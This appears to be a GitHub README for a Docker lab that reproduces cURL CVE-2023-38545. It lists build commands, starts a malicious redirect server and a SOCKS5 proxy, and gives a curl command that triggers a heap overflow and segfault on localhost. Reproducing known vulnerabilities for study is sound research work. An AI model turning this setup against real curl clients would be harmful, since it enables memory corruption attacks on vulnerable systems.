Quick description

This showcases the cURL CVE-2023-38545. It is as lightweight as I could make it.

Setup

First, build the Docker Image:

docker build . -t cveimage

Next, we can simply run the image file, creating a temporary Docker Container which will get deleted once the container is stopped:

docker run --rm --tty --net="host" --name cvecontainer cveimage

If you are struggling to type commands, simply open another terminal and run:

docker exec -it cvecontainer /bin/bash

Now, we need to start all the services. Connect to the already-running container, and run:

./exploit/malicious_redirect_server.sh &

python3 /exploit/proxy.py &

Now, from inside the container you can see the cURL exploit in action:

curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000

You must see a segmentation fault error on the machine that ran the curl command to know that the exploit succeeded. If you do not see it, either the exploit did not occur, or the process had so much heap space available that you did not overwrite into inaccessible memory.

More work (PRs welcome)

Make this README look pretty
Configure systemd to automatically start the exploit code
Reduce Docker Image build time and size
Anything/everything else. . .?

References

The socks5 proxy is not self-made. The original code for the proxy can be found here: https://github.com/alexbers/tgsocksproxy
- Originally exploited in ubuntu (wsl) with systemd support: https://github.com/aire1/mtproxy_autoinstaller
The hackerone report, which saved tons of research time. Give this a read through if you want to understand how this exploit occurs: https://hackerone.com/reports/2187833

About

Dockerfile containing all the necessary setup files to demo the exploit

GNU General Public License v3.0

Languages

Language:Python 84.9%Language:Dockerfile 11.8%Language:Shell 3.3%